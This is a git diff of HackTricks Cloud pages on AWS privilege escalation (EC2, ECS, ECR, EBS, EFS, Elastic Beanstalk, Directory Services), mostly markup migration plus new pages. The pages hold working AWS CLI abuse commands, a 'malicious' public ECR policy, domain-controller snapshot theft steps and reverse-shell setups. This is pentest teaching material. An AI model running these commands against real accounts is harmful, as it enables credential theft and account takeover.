file:///pipeline/definition.json +``` + +The **pipeline definition file, crafted by the attacker, includes directives to execute commands** or create resources via the AWS API, leveraging the Data Pipeline's role permissions to potentially gain additional privileges. + +**Potential Impact:** Direct privesc to the ec2 service role specified. + +## References + +- [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md new file mode 100644 index 000000000..8785f58af --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md @@ -0,0 +1,34 @@ +# AWS - Directory Services Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## Directory Services + +For more info about directory services check: + +{{#ref}} +../aws-services/aws-directory-services-workdocs-enum.md +{{#endref}} + +### `ds:ResetUserPassword` + +This permission allows to **change** the **password** of any **existent** user in the Active Directory.\ +By default, the only existent user is **Admin**. + +``` +aws ds reset-user-password --directory-id --user-name Admin --new-password Newpassword123. +``` + +### AWS Management Console + +It's possible to enable an **application access URL** that users from AD can access to login: + +
+ +And then **grant them an AWS IAM role** for when they login, this way an AD user/group will have access over AWS management console: + +
+ +There isn't apparently any way to enable the application access URL, the AWS Management Console and grant permission + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md new file mode 100644 index 000000000..01661912c --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md @@ -0,0 +1,23 @@ +# AWS - DynamoDB Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## dynamodb + +For more info about dynamodb check: + +{{#ref}} +../aws-services/aws-dynamodb-enum.md +{{#endref}} + +### Post Exploitation + +As far as I know there is **no direct way to escalate privileges in AWS just by having some AWS `dynamodb` permissions**. You can **read sensitive** information from the tables (which could contain AWS credentials) and **write information on the tables** (which could trigger other vulnerabilities, like lambda code injections...) but all these options are already considered in the **DynamoDB Post Exploitation page**: + +{{#ref}} +../aws-post-exploitation/aws-dynamodb-post-exploitation.md +{{#endref}} + +### TODO: Read data abusing data Streams + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md new file mode 100644 index 000000000..ca59c9402 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md @@ -0,0 +1,27 @@ +# AWS - EBS Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## EBS + +### `ebs:ListSnapshotBlocks`, `ebs:GetSnapshotBlock`, `ec2:DescribeSnapshots` + +An attacker with those will be able to potentially **download and analyze volumes snapshots locally** and search for sensitive information in them (like secrets or source code). Find how to do this in: + +{{#ref}} +../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md +{{#endref}} + +Other permissions might be also useful such as: `ec2:DescribeInstances`, `ec2:DescribeVolumes`, `ec2:DeleteSnapshot`, `ec2:CreateSnapshot`, `ec2:CreateTags` + +The tool [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) performs this attack to e**xtract passwords from a domain controller**. + +**Potential Impact:** Indirect privesc by locating sensitive information in the snapshot (you could even get Active Directory passwords). + +### **`ec2:CreateSnapshot`** + +Any AWS user possessing the **`EC2:CreateSnapshot`** permission can steal the hashes of all domain users by creating a **snapshot of the Domain Controller** mounting it to an instance they control and **exporting the NTDS.dit and SYSTEM** registry hive file for use with Impacket's secretsdump project. + +You can use this tool to automate the attack: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) or you could use one of the previous techniques after creating a snapshot. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md similarity index 77% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md index 678a7bdf3..090c4e70d 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md @@ -1,33 +1,20 @@ # AWS - EC2 Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## EC2 For more **info about EC2** check: -{% content-ref url="../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %} -[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ +{{#endref}} ### `iam:PassRole`, `ec2:RunInstances` An attacker could **create and instance attaching an IAM role and then access the instance** to steal the IAM role credentials from the metadata endpoint. -* **Access via SSH** +- **Access via SSH** Run a new instance using a **created** **ssh key** (`--key-name`) and then ssh into it (if you want to create a new one you might need to have the permission `ec2:CreateKeyPair`). @@ -37,7 +24,7 @@ aws ec2 run-instances --image-id --instance-type t2.micro \ --security-group-ids ``` -* **Access via rev shell in user data** +- **Access via rev shell in user data** You can run a new instance using a **user data** (`--user-data`) that will send you a **rev shell**. You don't need to specify security group this way. @@ -53,9 +40,9 @@ aws ec2 run-instances --image-id --instance-type t2.micro \ Be careful with GuradDuty if you use the credentials of the IAM role outside of the instance: -{% content-ref url="../aws-services/aws-security-and-detection-services/aws-guardduty-enum.md" %} -[aws-guardduty-enum.md](../aws-services/aws-security-and-detection-services/aws-guardduty-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-security-and-detection-services/aws-guardduty-enum.md +{{#endref}} **Potential Impact:** Direct privesc to a any EC2 role attached to existing instance profiles. @@ -63,14 +50,13 @@ Be careful with GuradDuty if you use the credentials of the IAM role outside of With this set of permissions you could also **create an EC2 instance and register it inside an ECS cluster**. This way, ECS **services** will be **run** in inside the **EC2 instance** where you have access and then you can penetrate those services (docker containers) and **steal their ECS roles attached**. -{% code overflow="wrap" %} ```bash aws ec2 run-instances \ --image-id ami-07fde2ae86109a2af \ --instance-type t2.micro \ --iam-instance-profile \ --count 1 --key-name pwned \ - --user-data "file:///tmp/asd.sh" + --user-data "file:///tmp/asd.sh" # Make sure to use an ECS optimized AMI as it has everything installed for ECS already (amzn2-ami-ecs-hvm-2.0.20210520-x86_64-ebs) # The EC2 instance profile needs basic ECS access @@ -78,13 +64,12 @@ aws ec2 run-instances \ #!/bin/bash echo ECS_CLUSTER= >> /etc/ecs/ecs.config;echo ECS_BACKEND_HOST= >> /etc/ecs/ecs.config; ``` -{% endcode %} To learn how to **force ECS services to be run** in this new EC2 instance check: -{% content-ref url="aws-ecs-privesc.md" %} -[aws-ecs-privesc.md](aws-ecs-privesc.md) -{% endcontent-ref %} +{{#ref}} +aws-ecs-privesc.md +{{#endref}} If you **cannot create a new instance** but has the permission `ecs:RegisterContainerInstance` you might be able to register the instance inside the cluster and perform the commented attack. @@ -95,7 +80,6 @@ If you **cannot create a new instance** but has the permission `ecs:RegisterCont Similar to the previous scenario, an attacker with these permissions could **change the IAM role of a compromised instance** so he could steal new credentials.\ As an instance profile can only have 1 role, if the instance profile **already has a role** (common case), you will also need **`iam:RemoveRoleFromInstanceProfile`**. -{% code overflow="wrap" %} ```bash # Removing role from instance profile aws iam remove-role-from-instance-profile --instance-profile-name --role-name @@ -103,17 +87,14 @@ aws iam remove-role-from-instance-profile --instance-profile-name --role- # Add role to instance profile aws iam add-role-to-instance-profile --instance-profile-name --role-name ``` -{% endcode %} If the **instance profile has a role** and the attacker **cannot remove it**, there is another workaround. He could **find** an **instance profile without a role** or **create a new one** (`iam:CreateInstanceProfile`), **add** the **role** to that **instance profile** (as previously discussed), and **associate the instance profile** compromised to a compromised i**nstance:** -* If the instance **doesn't have any instance** profile (`ec2:AssociateIamInstanceProfile`) \* +- If the instance **doesn't have any instance** profile (`ec2:AssociateIamInstanceProfile`) \* -{% code overflow="wrap" %} ```bash aws ec2 associate-iam-instance-profile --iam-instance-profile Name= --instance-id ``` -{% endcode %} **Potential Impact:** Direct privesc to a different EC2 role (you need to have compromised a AWS EC2 instance and some extra permission or specific instance profile status). @@ -121,25 +102,21 @@ aws ec2 associate-iam-instance-profile --iam-instance-profile Name= --ins With these permissions it's possible to change the instance profile associated to an instance so if the attack had already access to an instance he will be able to steal credentials for more instance profile roles changing the one associated with it. -* If it **has an instance profile**, you can **remove** the instance profile (`ec2:DisassociateIamInstanceProfile`) and **associate** it \* +- If it **has an instance profile**, you can **remove** the instance profile (`ec2:DisassociateIamInstanceProfile`) and **associate** it \* -{% code overflow="wrap" %} ```bash aws ec2 describe-iam-instance-profile-associations --filters Name=instance-id,Values=i-0d36d47ba15d7b4da aws ec2 disassociate-iam-instance-profile --association-id aws ec2 associate-iam-instance-profile --iam-instance-profile Name= --instance-id ``` -{% endcode %} -* or **replace** the **instance profile** of the compromised instance (`ec2:ReplaceIamInstanceProfileAssociation`). \* +- or **replace** the **instance profile** of the compromised instance (`ec2:ReplaceIamInstanceProfileAssociation`). \* -{% code overflow="wrap" %} ```` ```bash aws ec2 replace-iam-instance-profile-association --iam-instance-profile Name= --association-id ``` ```` -{% endcode %} **Potential Impact:** Direct privesc to a different EC2 role (you need to have compromised a AWS EC2 instance and some extra permission or specific instance profile status). @@ -148,7 +125,6 @@ aws ec2 replace-iam-instance-profile-association --iam-instance-profile Name=[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md new file mode 100644 index 000000000..bcf68a122 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md @@ -0,0 +1,108 @@ +# AWS - ECR Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## ECR + +### `ecr:GetAuthorizationToken`,`ecr:BatchGetImage` + +An attacker with the **`ecr:GetAuthorizationToken`** and **`ecr:BatchGetImage`** can login to ECR and download images. + +For more info on how to download images: + +{{#ref}} +../aws-post-exploitation/aws-ecr-post-exploitation.md +{{#endref}} + +**Potential Impact:** Indirect privesc by intercepting sensitive information in the traffic. + +### `ecr:GetAuthorizationToken`, `ecr:BatchCheckLayerAvailability`, `ecr:CompleteLayerUpload`, `ecr:InitiateLayerUpload`, `ecr:PutImage`, `ecr:UploadLayerPart` + +An attacker with the all those permissions **can login to ECR and upload images**. This can be useful to escalate privileges to other environments where those images are being used. + +To learn how to upload a new image/update one, check: + +{{#ref}} +../aws-services/aws-eks-enum.md +{{#endref}} + +### `ecr-public:GetAuthorizationToken`, `ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload`, `ecr-public:InitiateLayerUpload, ecr-public:PutImage`, `ecr-public:UploadLayerPart` + +Like the previous section, but for public repositories. + +### `ecr:SetRepositoryPolicy` + +An attacker with this permission could **change** the **repository** **policy** to grant himself (or even everyone) **read/write access**.\ +For example, in this example read access is given to everyone. + +```bash +aws ecr set-repository-policy \ + --repository-name \ + --policy-text file://my-policy.json +``` + +Contents of `my-policy.json`: + +```json +{ + "Version": "2008-10-17", + "Statement": [ + { + "Sid": "allow public pull", + "Effect": "Allow", + "Principal": "*", + "Action": [ + "ecr:BatchCheckLayerAvailability", + "ecr:BatchGetImage", + "ecr:GetDownloadUrlForLayer" + ] + } + ] +} +``` + +### `ecr-public:SetRepositoryPolicy` + +Like the previoous section, but for public repositories.\ +An attacker can **modify the repository policy** of an ECR Public repository to grant unauthorized public access or to escalate their privileges. + +```bash +bashCopy code# Create a JSON file with the malicious public repository policy +echo '{ + "Version": "2008-10-17", + "Statement": [ + { + "Sid": "MaliciousPublicRepoPolicy", + "Effect": "Allow", + "Principal": "*", + "Action": [ + "ecr-public:GetDownloadUrlForLayer", + "ecr-public:BatchGetImage", + "ecr-public:BatchCheckLayerAvailability", + "ecr-public:PutImage", + "ecr-public:InitiateLayerUpload", + "ecr-public:UploadLayerPart", + "ecr-public:CompleteLayerUpload", + "ecr-public:DeleteRepositoryPolicy" + ] + } + ] +}' > malicious_public_repo_policy.json + +# Apply the malicious public repository policy to the ECR Public repository +aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json +``` + +**Potential Impact**: Unauthorized public access to the ECR Public repository, allowing any user to push, pull, or delete images. + +### `ecr:PutRegistryPolicy` + +An attacker with this permission could **change** the **registry policy** to grant himself, his account (or even everyone) **read/write access**. + +```bash +aws ecr set-repository-policy \ + --repository-name \ + --policy-text file://my-policy.json +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md similarity index 75% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md index 793ce44c2..31eaefddb 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md @@ -1,27 +1,14 @@ # AWS - ECS Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## ECS More **info about ECS** in: -{% content-ref url="../aws-services/aws-ecs-enum.md" %} -[aws-ecs-enum.md](../aws-services/aws-ecs-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-ecs-enum.md +{{#endref}} ### `iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:RunTask` @@ -105,7 +92,6 @@ aws ecs update-service --cluster \ Actually, just with those permissions it's possible to use overrides to executer arbitrary commands in a container with an arbitrary role with something like: -{% code overflow="wrap" %} ```bash aws ecs run-task \ --task-definition "" \ @@ -113,7 +99,6 @@ aws ecs run-task \ --cluster \ --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"DISABLED\", \"subnets\":[\"\"]}}" ``` -{% endcode %} **Potential Impact:** Direct privesc to any ECS role. @@ -123,9 +108,8 @@ This scenario is like the previous ones but **without** the **`iam:PassRole`** p This is still interesting because if you can run an arbitrary container, even if it's without a role, you could **run a privileged container to escape** to the node and **steal the EC2 IAM role** and the **other ECS containers roles** running in the node.\ You could even **force other tasks to run inside the EC2 instance** you compromise to steal their credentials (as discussed in the [**Privesc to node section**](aws-ecs-privesc.md#privesc-to-node)). -{% hint style="warning" %} -This attack is only possible if the **ECS cluster is using EC2** instances and not Fargate. -{% endhint %} +> [!WARNING] +> This attack is only possible if the **ECS cluster is using EC2** instances and not Fargate. ```bash printf '[ @@ -175,7 +159,7 @@ However, in order to do that, the container instance need to be running the **Ex Therefore, the attacker cloud try to: -* **Try to run a command** in every running container +- **Try to run a command** in every running container ```bash # List enableExecuteCommand on each task @@ -195,10 +179,10 @@ aws ecs execute-command --interactive \ --task "$TASK_ARN" ``` -* If he has **`ecs:RunTask`**, run a task with `aws ecs run-task --enable-execute-command [...]` -* If he has **`ecs:StartTask`**, run a task with `aws ecs start-task --enable-execute-command [...]` -* If he has **`ecs:CreateService`**, create a service with `aws ecs create-service --enable-execute-command [...]` -* If he has **`ecs:UpdateService`**, update a service with `aws ecs update-service --enable-execute-command [...]` +- If he has **`ecs:RunTask`**, run a task with `aws ecs run-task --enable-execute-command [...]` +- If he has **`ecs:StartTask`**, run a task with `aws ecs start-task --enable-execute-command [...]` +- If he has **`ecs:CreateService`**, create a service with `aws ecs create-service --enable-execute-command [...]` +- If he has **`ecs:UpdateService`**, update a service with `aws ecs update-service --enable-execute-command [...]` You can find **examples of those options** in **previous ECS privesc sections**. @@ -208,17 +192,17 @@ You can find **examples of those options** in **previous ECS privesc sections**. Check in the **ssm privesc page** how you can abuse this permission to **privesc to ECS**: -{% content-ref url="aws-ssm-privesc.md" %} -[aws-ssm-privesc.md](aws-ssm-privesc.md) -{% endcontent-ref %} +{{#ref}} +aws-ssm-privesc.md +{{#endref}} ### `iam:PassRole`, `ec2:RunInstances` Check in the **ec2 privesc page** how you can abuse these permissions to **privesc to ECS**: -{% content-ref url="aws-ec2-privesc.md" %} -[aws-ec2-privesc.md](aws-ec2-privesc.md) -{% endcontent-ref %} +{{#ref}} +aws-ec2-privesc.md +{{#endref}} ### `?ecs:RegisterContainerInstance` @@ -226,9 +210,8 @@ TODO: Is it possible to register an instance from a different AWS account so tas ### `ecs:CreateTaskSet`, `ecs:UpdateServicePrimaryTaskSet`, `ecs:DescribeTaskSets` -{% hint style="info" %} -TODO: Test this -{% endhint %} +> [!NOTE] +> TODO: Test this An attacker with the permissions `ecs:CreateTaskSet`, `ecs:UpdateServicePrimaryTaskSet`, and `ecs:DescribeTaskSets` can **create a malicious task set for an existing ECS service and update the primary task set**. This allows the attacker to **execute arbitrary code within the service**. @@ -262,19 +245,6 @@ aws ecs update-service-primary-task-set --cluster existing-cluster --service exi ## References -* [https://ruse.tech/blogs/ecs-attack-methods](https://ruse.tech/blogs/ecs-attack-methods) +- [https://ruse.tech/blogs/ecs-attack-methods](https://ruse.tech/blogs/ecs-attack-methods) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md similarity index 56% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md index 566ce8d05..821263148 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md @@ -1,27 +1,14 @@ # AWS - EFS Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## EFS More **info about EFS** in: -{% content-ref url="../aws-services/aws-efs-enum.md" %} -[aws-efs-enum.md](../aws-services/aws-efs-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-efs-enum.md +{{#endref}} Remember that in order to mount an EFS you need to be in a subnetwork where the EFS is exposed and have access to it (security groups). Is this is happening, by default, you will always be able to mount it, however, if it's protected by IAM policies you need to have the extra permissions mentioned here to access it. @@ -42,7 +29,7 @@ To change it: aws efs put-file-system-policy --file-system-id --policy file:///tmp/policy.json // Give everyone trying to mount it read, write and root access -// policy.json: +// policy.json: { "Version": "2012-10-17", "Id": "efs-policy-wizard-059944c6-35e7-4ba0-8e40-6f05302d5763", @@ -106,17 +93,4 @@ aws efs modify-mount-target-security-groups \ **Potential Impact:** Indirect privesc by locating sensitive information in the file system. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md similarity index 54% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md index fc4a278bf..e974efeb9 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md @@ -1,37 +1,22 @@ # AWS - Elastic Beanstalk Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Elastic Beanstalk More **info about Elastic Beanstalk** in: -{% content-ref url="../aws-services/aws-elastic-beanstalk-enum.md" %} -[aws-elastic-beanstalk-enum.md](../aws-services/aws-elastic-beanstalk-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-elastic-beanstalk-enum.md +{{#endref}} -{% hint style="warning" %} -In order to perform sensitive actions in Beanstalk you will need to have a **lot of sensitive permissions in a lot of different services**. You can check for example the permissions given to **`arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk`** -{% endhint %} +> [!WARNING] +> In order to perform sensitive actions in Beanstalk you will need to have a **lot of sensitive permissions in a lot of different services**. You can check for example the permissions given to **`arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk`** ### `elasticbeanstalk:RebuildEnvironment`, S3 write permissions & many others With **write permissions over the S3 bucket** containing the **code** of the environment and permissions to **rebuild** the application (it's needed `elasticbeanstalk:RebuildEnvironment` and a few more related to `S3` , `EC2` and `Cloudformation`), you can **modify** the **code**, **rebuild** the app and the next time you access the app it will **execute your new code**, allowing the attacker to compromise the application and the IAM role credentials of it. -{% code overflow="wrap" %} ```bash # Create folder mkdir elasticbeanstalk-eu-west-1-947247140022 @@ -46,62 +31,56 @@ aws s3 cp 1692777270420-aws-flask-app.zip s3://elasticbeanstalk-eu-west-1-947247 # Rebuild env aws elasticbeanstalk rebuild-environment --environment-name "env-name" ``` -{% endcode %} ### `elasticbeanstalk:CreateApplication`, `elasticbeanstalk:CreateEnvironment`, `elasticbeanstalk:CreateApplicationVersion`, `elasticbeanstalk:UpdateEnvironment`, `iam:PassRole`, and more... The mentioned plus several **`S3`**, **`EC2`, `cloudformation`** ,**`autoscaling`** and **`elasticloadbalancing`** permissions are the necessary to create a raw Elastic Beanstalk scenario from scratch. -* Create an AWS Elastic Beanstalk application: +- Create an AWS Elastic Beanstalk application: ```bash aws elasticbeanstalk create-application --application-name MyApp ``` -* Create an AWS Elastic Beanstalk environment ([**supported platforms**](https://docs.aws.amazon.com/elasticbeanstalk/latest/platforms/platforms-supported.html#platforms-supported.python)): +- Create an AWS Elastic Beanstalk environment ([**supported platforms**](https://docs.aws.amazon.com/elasticbeanstalk/latest/platforms/platforms-supported.html#platforms-supported.python)): -{% code overflow="wrap" %} ```bash aws elasticbeanstalk create-environment --application-name MyApp --environment-name MyEnv --solution-stack-name "64bit Amazon Linux 2 v3.4.2 running Python 3.8" --option-settings Namespace=aws:autoscaling:launchconfiguration,OptionName=IamInstanceProfile,Value=aws-elasticbeanstalk-ec2-role ``` -{% endcode %} If an environment is already created and you **don't want to create a new one**, you could just **update** the existent one. -* Package your application code and dependencies into a ZIP file: +- Package your application code and dependencies into a ZIP file: ```python zip -r MyApp.zip . ``` -* Upload the ZIP file to an S3 bucket: +- Upload the ZIP file to an S3 bucket: ```python aws s3 cp MyApp.zip s3://elasticbeanstalk--/MyApp.zip ``` -* Create an AWS Elastic Beanstalk application version: +- Create an AWS Elastic Beanstalk application version: -{% code overflow="wrap" %} ```css aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-1.0 --source-bundle S3Bucket="elasticbeanstalk--",S3Key="MyApp.zip" ``` -{% endcode %} -* Deploy the application version to your AWS Elastic Beanstalk environment: +- Deploy the application version to your AWS Elastic Beanstalk environment: -{% code overflow="wrap" %} ```bash aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0 ``` -{% endcode %} ### `elasticbeanstalk:CreateApplicationVersion`, `elasticbeanstalk:UpdateEnvironment`, `cloudformation:GetTemplate`, `cloudformation:DescribeStackResources`, `cloudformation:DescribeStackResource`, `autoscaling:DescribeAutoScalingGroups`, `autoscaling:SuspendProcesses`, `autoscaling:SuspendProcesses` First of all you need to create a **legit Beanstalk environment** with the **code** you would like to run in the **victim** following the **previous steps**. Potentially a simple **zip** containing these **2 files**: -{% tabs %} -{% tab title="application.py" %} +{{#tabs }} +{{#tab name="application.py" }} + ```python from flask import Flask, request, jsonify import subprocess,os, socket @@ -133,9 +112,11 @@ def search(): if __name__=="__main__": application.run() ``` -{% endtab %} -{% tab title="requirements.txt" %} +{{#endtab }} + +{{#tab name="requirements.txt" }} + ``` click==7.1.2 Flask==1.1.2 @@ -144,47 +125,47 @@ Jinja2==2.11.3 MarkupSafe==1.1.1 Werkzeug==1.0.1 ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} Once you have **your own Beanstalk env running** your rev shell, 